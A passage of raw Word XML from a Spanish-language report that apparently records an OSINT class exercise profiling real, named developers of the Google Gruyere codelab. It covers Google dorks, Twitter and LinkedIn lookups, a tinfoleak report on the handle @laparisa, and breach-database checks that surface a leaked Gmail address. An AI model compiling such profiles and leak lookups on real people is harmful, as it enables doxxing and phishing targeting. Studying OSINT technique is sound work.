            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="35C89D39" w14:textId="3F147896" w:rsidR="00613F8A" w:rsidRDefault="00613F8A" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>Resultado:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0F62DE53" w14:textId="5EF7C2BC" w:rsidR="00C60A8C" w:rsidRDefault="00C60A8C" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="61F6830E" w14:textId="0776D9D4" w:rsidR="00C60A8C" w:rsidRDefault="00C60A8C" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00C60A8C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18F9A16F" wp14:editId="6B4EBE05">
                <wp:extent cx="5400040" cy="3671147"/>
                <wp:effectExtent l="0" t="0" r="0" b="571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1224" cy="3671952"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="758F3E47" w14:textId="135526B4" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="44BA7313" w14:textId="7379B620" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:lastRenderedPageBreak/>
            <w:t>El primer perfil no se puede verificar que sea ella, y el segundo no existe.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1F4CD29A" w14:textId="613823DA" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00613F8A">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="41C44E18" w14:textId="2EA9F04D" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t>Ahora con Google dorcs.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="48748C05" w14:textId="77777777" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7314AE01" w14:textId="5CFC2349" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Este será el dorc: </w:t>
          </w:r>
          <w:r w:rsidRPr="00EE0ECE">
            <w:t>"</w:t>
          </w:r>
          <w:r w:rsidRPr="008353EE">
            <w:rPr>
              <w:color w:val="44546A" w:themeColor="text2"/>
            </w:rPr>
            <w:t>mugdha-myers*.com</w:t>
          </w:r>
          <w:r w:rsidRPr="00EE0ECE">
            <w:t>"</w:t>
          </w:r>
          <w:r>
            <w:t>, y sale esto:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4FE283C1" w14:textId="3FE573F5" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="609E469C" w14:textId="2D3DFD19" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00EE0ECE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59C20FD0" wp14:editId="29A4AAED">
                <wp:extent cx="5400040" cy="5237480"/>
                <wp:effectExtent l="0" t="0" r="0" b="127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5237480"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="3E2367FF" w14:textId="6F597927" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5689AD00" w14:textId="795CE7C6" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Su </w:t>
          </w:r>
          <w:r w:rsidR="00D911EB">
            <w:t>T</w:t>
          </w:r>
          <w:r>
            <w:t>witter:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="35C48D53" w14:textId="506E7CC6" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="39B586AE" w14:textId="29FD446E" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00EE0ECE">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17C29EBB" wp14:editId="6047DFE5">
                <wp:extent cx="5400040" cy="4925695"/>
                <wp:effectExtent l="0" t="0" r="0" b="825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925695"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7436FD95" w14:textId="7CAB4439" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="51652BBA" w14:textId="2C604996" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00EE0ECE">
            <w:t>Leaddev</w:t>
          </w:r>
          <w:r>
            <w:t>:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="04F3C242" w14:textId="16700B63" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="63718B49" w14:textId="7D99D270" w:rsidR="00EE0ECE" w:rsidRDefault="00034B11" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r w:rsidRPr="00034B11">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77023844" wp14:editId="3438AEE2">
                <wp:extent cx="5400040" cy="5085080"/>
                <wp:effectExtent l="0" t="0" r="0" b="127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5085080"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="112B17B0" w14:textId="3D387E4C" w:rsidR="00034B11" w:rsidRDefault="00034B11" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3B520EC3" w14:textId="7BDFF50B" w:rsidR="00034B11" w:rsidRDefault="00034B11" w:rsidP="00E713B6">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
          <w:r>
            <w:t>Mirando estas páginas sigo sin encontrar nada relacionado con su correo, y probando correo</w:t>
          </w:r>
          <w:r w:rsidR="00FC35F3">
            <w:t>s</w:t>
          </w:r>
          <w:r w:rsidR="00E713B6">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:t>con su nombre de usuario no encuentro ningún correo comprometido.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="59C8A8EC" w14:textId="02053E61" w:rsidR="00D15F50" w:rsidRDefault="00D15F50" w:rsidP="00E713B6">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1E36BE25" w14:textId="13290C45" w:rsidR="00D15F50" w:rsidRDefault="00D15F50">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="16"/>
            </w:numPr>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Ahora hablaremos de su trabajo, según su LinkedIn estuvo trabajando para Google desde 2012 -2021, en este año se toma un descanso del trabajo: </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="28C86E56" w14:textId="254A4B0A" w:rsidR="00D15F50" w:rsidRDefault="00D15F50" w:rsidP="00D15F50">
          <w:pPr>
            <w:ind w:left="1416"/>
          </w:pPr>
          <w:r w:rsidRPr="00D15F50">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E2D7FD2" wp14:editId="4AD1B015">
                <wp:extent cx="5400040" cy="4616450"/>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616450"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="68AC56E2" w14:textId="368DF98A" w:rsidR="00E713B6" w:rsidRPr="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7FAAF57A" w14:textId="3DD0D5E0" w:rsidR="00E713B6" w:rsidRDefault="00E713B6">
          <w:pPr>
            <w:pStyle w:val="Ttulo2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="24"/>
            </w:numPr>
          </w:pPr>
          <w:bookmarkStart w:id="35" w:name="_Toc128034146"/>
          <w:r w:rsidRPr="00E713B6">
            <w:t>Parisa Tabriz</w:t>
          </w:r>
          <w:bookmarkEnd w:id="35"/>
        </w:p>
        <w:p w14:paraId="0FA9B6CA" w14:textId="7CD610A3" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3B493254" w14:textId="20EE37C0" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Este es el último miembro que desarrolló el codelab de Google Gruyere.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6DDD90B2" w14:textId="40171356" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Si buscamos su nombre en Google sale esto:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="504D90D3" w14:textId="4AB9CC8A" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="54E89476" w14:textId="536694B7" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00E713B6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F46728" wp14:editId="646D6272">
                <wp:extent cx="5400040" cy="4976495"/>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976495"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="21642080" w14:textId="193F972F" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3797A0E5" w14:textId="7927172E" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Primero miraremos su LinkedIn:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6BB13F63" w14:textId="09D9A697" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="7DD89870" w14:textId="08E8F3BA" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00E713B6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45AD3A7B" wp14:editId="4364B10C">
                <wp:extent cx="5400040" cy="5242560"/>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242560"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="6BDADC4B" w14:textId="46420C27" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6ED90503" w14:textId="02A6AAEA" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Encontramos este usuario:</w:t>
          </w:r>
          <w:r w:rsidR="00367C67">
            <w:t xml:space="preserve"> parisatabriz.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="163ECA89" w14:textId="01EC9FF2" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6DC0C6E6" w14:textId="3749DCF1" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Ahora miraremos en twitter:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="27ADCAD1" w14:textId="514A6F6B" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2FA13E41" w14:textId="6908A7CF" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00E713B6">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57A65A20" wp14:editId="5E3D1983">
                <wp:extent cx="5400040" cy="474472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744720"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="0C1A8C4A" w14:textId="7184AF6C" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="0A4AB973" w14:textId="0A4B89AD" w:rsidR="00E713B6" w:rsidRDefault="00E713B6" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Consiguiendo otro usuario: @laparisa.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0EED5691" w14:textId="421EAC4D" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2DC4E595" w14:textId="1B472C3E" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t xml:space="preserve">Mediante la página web </w:t>
          </w:r>
          <w:hyperlink r:id="rId48" w:history="1">
            <w:r w:rsidRPr="00963981">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
              </w:rPr>
              <w:t>https://tinfoleak.com/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:t>, genero un informe con información sobre su cuenta de Twitter:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="14790AA3" w14:textId="2D362162" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00BC44A8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="147DA1DF" wp14:editId="781087C9">
                <wp:extent cx="5400040" cy="4777105"/>
                <wp:effectExtent l="0" t="0" r="0" b="444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777105"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="10AB6DB8" w14:textId="1B9CD967" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6B4D08AD" w14:textId="200771AD" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00BC44A8">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44888ADB" wp14:editId="1DE61D86">
                <wp:extent cx="5400040" cy="485902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859020"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="58A0C513" w14:textId="2AB551D4" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="09110963" w14:textId="39A14534" w:rsidR="00BC44A8" w:rsidRDefault="00BC44A8" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Proporcione enlace al informe:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7AE8B307" w14:textId="75786AED" w:rsidR="00BC44A8" w:rsidRDefault="00000000" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:hyperlink r:id="rId51" w:history="1">
            <w:r w:rsidR="00BC44A8" w:rsidRPr="00963981">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
              </w:rPr>
              <w:t>https://tinfoleak.com/reports2/laparisa.html</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00BC44A8">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="65DCEB6C" w14:textId="67408C7D" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="325A73B9" w14:textId="7B136DE0" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Con el nombre de usuario no encontramos ningún correo filtrado, pero en cambio con el de LinkedIn si, concretamente una cuenta de Gmail:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="336B35D1" w14:textId="32FC6E1D" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="19192A8D" w14:textId="5E9EF124" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="003C4A9A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA0B6C0" wp14:editId="0079E04F">
                <wp:extent cx="5400040" cy="503428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5034280"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="1295E5FF" w14:textId="1BA52681" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="00E713B6">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="29C2E58D" w14:textId="7A7D4877" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>En este caso fue en 2018 y en una tienda de ropa llamada HauteLook.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="015277C3" w14:textId="65E033A7" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="652A6D80" w14:textId="756D5048" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Siguiendo buscando encuentro esto:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7DADD93B" w14:textId="1173AF09" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1E0EB6D3" w14:textId="4DFC9817" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00493E29">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66DA75F9" wp14:editId="7D054387">
                <wp:extent cx="5400040" cy="2952115"/>
                <wp:effectExtent l="0" t="0" r="0" b="63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952115"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="6E63828B" w14:textId="7A9406AE" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1E7F617F" w14:textId="71E68EE6" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Página que aparece en su perfil de LinkedIn, consiguiendo su currículo y un nuevo correo:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="0BECF895" w14:textId="77777777" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="1BD1288A" w14:textId="3504F93A" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00493E29">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF05EA1" wp14:editId="41E1406E">
                <wp:extent cx="5400040" cy="5805170"/>
                <wp:effectExtent l="0" t="0" r="0" b="508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5805170"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1ADA00A9" w14:textId="38581E06" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="2784A2B9" w14:textId="2A04CFB5" w:rsidR="00493E29" w:rsidRDefault="00493E29" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:t>Ahora probaremos a ver si este correo tuvo fugas de datos:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6694647E" w14:textId="12ED596B" w:rsidR="003C4A9A" w:rsidRDefault="003C4A9A" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="368C1CBD" w14:textId="44F1697E" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r w:rsidRPr="00AE2AF1">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62E2BC46" wp14:editId="1BFFF1F1">
                <wp:extent cx="5400040" cy="5022215"/>
                <wp:effectExtent l="0" t="0" r="0" b="698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5022215"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </w:r>
        </w:p>
        <w:p w14:paraId="7C68D06D" w14:textId="5C10D4A4" w:rsidR="00AE2AF1" w:rsidRDefault="00AE2AF1" w:rsidP="003C4A9A">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
        </w:p>
